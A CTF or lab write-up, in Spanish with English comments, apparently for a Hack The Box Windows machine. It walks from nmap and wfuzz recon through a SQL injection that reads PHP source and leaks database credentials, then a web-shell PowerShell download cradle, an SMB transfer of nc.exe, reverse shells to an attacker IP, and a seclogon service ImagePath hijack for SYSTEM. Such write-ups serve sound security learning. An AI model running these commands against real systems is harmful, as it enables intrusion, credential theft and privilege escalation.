# Recon against the target (10.129.1.248), run from the attacking host.

# Full TCP range with aggressive detection (-A) plus the NSE "vuln" category.
# --min-rate=10000 is very noisy and can drop probes on slow links, and
# --script-timeout=15 (seconds) is short for many vuln scripts, so expect partial
# script results. Output is saved in all formats as output.*
nmap -A -p- -oA output 10.129.1.248 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Calmer re-scan: default scripts, version detection and OS fingerprint, saved as active.*
nmap -sC -sV -O -p- -oA active 10.129.1.248

# UDP over all 65535 ports is extremely slow (hours); --top-ports is usually the
# practical choice. -sU/-O need root for raw sockets.
nmap -sU -O -p- -oA active-udp 10.129.1.248

# Web server misconfiguration checks on port 80.
nikto -h 10.129.1.248:80

# Directory brute force, hiding 404s. 400 threads is aggressive — lower it if the
# target starts dropping connections or rate-limiting.
wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.248/FUZZ

Pasted image 20210902200953.png


Pasted image 20210816133925.png

Pasted image 20210902161556.png

Pasted image 20210902162042.png

# Fingerprint the web stack (server, frameworks, interesting headers) before poking at it.
whatweb 10.129.1.248

Pasted image 20210902162325.png

Pasted image 20210902172217.png

http://10.129.1.248

Pasted image 20210902172432.png

http://10.129.1.248/admin

Pasted image 20210902172620.png

Pasted image 20210902180119.png

Proxy -> Options -> Miscellaneous: marcar «Don't send items to Proxy history or live tasks, if out of scope» (así el historial no se llena con tráfico ajeno al objetivo).

Pasted image 20210902184549.png

Target -> Scope -> Include in scope: pulsamos Add y añadimos http://10.129.1.248 (solo se registrará el tráfico hacia el objetivo).

Pasted image 20210902184809.png

Proxy -> Options -> Match and Replace: pulsamos Add, tipo «Request header», dejamos Match vacío e introducimos `X-Forwarded-For: 192.168.4.28` en Replace. Con Match vacío la cabecera se añade a todas las peticiones en scope, de modo que la aplicación nos trate como si viniéramos de la IP interna 192.168.4.28.

Pasted image 20210902185215.png

productName=p' UNION SELECT TO_BASE64(LOAD_FILE('C:\\inetpub\\wwwroot\\admin.php')),2,3,4,5,6-- -

Pasted image 20210713150436.png

Copiamos el resultado (el código PHP en base64 que devuelve TO_BASE64) y lo pegamos entre las comillas del comando de abajo para reconstruir el archivo PHP. Ojo: hay que DECODIFICAR (`base64 -d`), no volver a codificar.

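# Paste the TO_BASE64() output from the SQLi response between the quotes. The response is
# base64-ENCODED PHP source, so it must be DECODED (-d) to rebuild admin.php — the original
# piped it through `base64` again, which would have encoded it a second time.
admin_b64=""
printf '%s' "$admin_b64" | base64 -d > admin.php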

Hacemos lo mismo con database.php (mismo payload cambiando la ruta a C:\\inetpub\\wwwroot\\database.php y decodificando el base64 del resultado).

Pasted image 20210713153248.png

Y vemos las credenciales de mariadb

Pasted image 20210713153330.png

Base de datos: warehouse — usuario: manager — contraseña: l3tm3!n

Pasted image 20210902202035.png Pasted image 20210902202053.png

Pasted image 20210902201952.png

Hacemos un git clone y modificamos la última línea del script Invoke-ConPtyShell.ps1 (la invocación final) para que haga un reverse shell a la máquina atacante. La IP y el puerto que pongamos ahí deben coincidir con nuestro listener; más abajo aparecen tanto 10.10.14.125 como 10.10.14.105 como IP del atacante, así que conviene comprobar cuál es la correcta.

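# Fetch ConPtyShell and edit the LAST line of the script (its self-invocation) so the
# loaded script connects back to our listener with the attacker IP/port.
git clone https://github.com/antonioCoco/ConPtyShell
cd ConPtyShell
# The file has a .ps1 extension; without it vim opens a new, empty buffer instead of the script.
vim Invoke-ConPtyShell.ps1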

![[Pasted image 20210902202739.png]]

http://10.129.1.248/uploads/revshell.php?cmd=powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.125/Invoke-ConPtyShell.ps1')

# Serve the current directory (the ConPtyShell checkout) over HTTP so the target can fetch
# Invoke-ConPtyShell.ps1. Start this BEFORE requesting the revshell URL above; binding port 80
# needs root.
python3 -m http.server 80

Pasted image 20210902203707.png

Empezamos con el reverse shell.

Pasted image 20210902203730.png

# Inside the ConPtyShell session on the target: working directory for the privesc tooling
# (assumes the folder already exists — create it with mkdir otherwise).
cd C:\Windows\Temp\privesc

# Find a local copy of nc.exe to push to the target. locate relies on its index; if it
# returns nothing, run updatedb or fall back to `find / -name nc.exe 2>/dev/null`.
locate nc.exe

# HTTP server again. The steps that follow actually move nc.exe over SMB (smbserver.py below),
# so this is only needed if you fetch the file with a web client instead.
python3 -m http.server 80

Pasted image 20210902210150.png

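# Share the current directory as \\<attacker>\smbFolder. The option is -smb2support
# ("-smbsupport" is not a valid flag); recent Windows builds typically have SMB1 disabled,
# so without SMB2 the mapping fails. "$(pwd)" is quoted so paths with spaces survive.
# The credentials travel in clear on the command line (visible in `ps`) and the share is
# reachable from any host that can route to us — stop the server when done.
python3 /opt/impacket/examples/smbserver.py smbFolder "$(pwd)" -smb2support -username cu3rv0x -password password123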

Pasted image 20210903090032.png

# Map the attacker's SMB share (credentials must match those given to smbserver.py).
# Cleartext password on the command line — acceptable in a lab, but unmap with
# `net use x: /delete` when finished.
net use x: \\10.10.14.105\smbFolder /user:cu3rv0x password123

Pasted image 20210903085945.png

# Pull nc.exe from the mapped share into the current directory (C:\Windows\Temp\privesc).
copy x:\nc.exe nc.exe

Pasted image 20210903090142.png

# Stage nc.exe in spool\drivers\color: this folder is typically writable by unprivileged
# users and readable by everyone, so both the hector session and the hijacked service
# below can execute it from here. `cp` is a PowerShell alias for Copy-Item; in cmd.exe
# use `copy` instead.
cp nc.exe C:\Windows\System32\spool\drivers\color\nc.exe

Pasted image 20210903090708.png

Pasted image 20210903093442.png

# Run nc.exe as hector through local PowerShell remoting, using hector's credentials (see
# screenshot above), to get a reverse shell back to the attacker on 443. Requires WinRM to be
# enabled and hector to be allowed to connect (administrator or Remote Management Users);
# have `nc -lvnp 443` listening first. `-e cmd` means the shell that comes back is cmd.exe.
$hectorUser = 'fidelity\hector'
$hectorPass = 'l33th4x0rhector'
$secureHectorPass = ConvertTo-SecureString -String $hectorPass -AsPlainText -Force
$hectorCred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $hectorUser, $secureHectorPass
Invoke-Command -ComputerName localhost -Credential $hectorCred -ScriptBlock {
    C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443
}

Pasted image 20210903093812.png

REM Now in the cmd.exe shell running as hector: list token privileges to see what this context allows.
whoami /priv

Pasted image 20210903094243.png

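# Copy winPEAS into the ConPtyShell checkout (the directory we serve / share) so the target can
# fetch it. The original wrote "ContPyShell" and then "ContPyshell": neither matches the cloned
# directory name and they differ in case from each other, so on Linux the cd would fail (and the
# cp would create a stray file instead of copying into the folder).
cp WinPEASany.exe ConPtyShell/
cd ConPtyShell
python3 -m http.server 80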

Pasted image 20210903094722.png

REM Map the share again from the hector shell. Drive mappings are per logon session, so the
REM x: mapping from the earlier shell is not visible here; a different letter avoids confusion.
net use y: \\10.10.14.105\smbFolder /user:cu3rv0x password123

Pasted image 20210903100612.png

REM Pull winPEAS from the share (SMB paths are case-insensitive) and then run winpeas.exe
REM (execution not shown) to enumerate privesc paths.
copy y:\winPEASany.exe winpeas.exe

Pasted image 20210903100538.png

En la salida de winPEAS vemos que uno de los servicios parados es seclogon (Secondary Logon), cuya configuración en el registro parece modificable desde nuestro usuario; lo comprobamos a continuación.

Pasted image 20210903101211.png

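REM Check the service state. Call sc.exe explicitly: in cmd.exe it is identical to `sc`, but if
REM these lines are pasted into PowerShell, `sc` is an alias for Set-Content and would silently
REM write a file named "query" instead of querying the service.
sc.exe query seclogon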

Pasted image 20210903101321.png

REM Dump the service's registry key. Note the current ImagePath value so it can be restored
REM once the attack is done.
reg query "HKLM\system\currentcontrolset\services\seclogon"

Pasted image 20210903101419.png

REM Hijack the service binary: point ImagePath at our nc.exe so the service (which runs as
REM LocalSystem) calls back to the attacker. Requires write access to this key as hector (as the
REM winPEAS output suggests). Have the listener (nc -lvnp 443) running first; the new ImagePath is
REM only executed when the service is started — not shown on this page, e.g. `sc.exe start seclogon`.
REM Afterwards restore the original ImagePath recorded from the reg query above.
reg add "HKLM\system\currentcontrolset\services\seclogon" /t REG_EXPAND_SZ /v ImagePath /d "C:\Windows\System32\spool\drivers\color\nc.exe -e cmd 10.10.14.105 443" /f

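# Listener for the SYSTEM shell, on the attacking host. The options need the leading dash
# (the original "nc lvnp 443" would try to connect to a host named "lvnp"). Start it before
# triggering the service.
nc -lvnp 443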

Pasted image 20210903101824.png
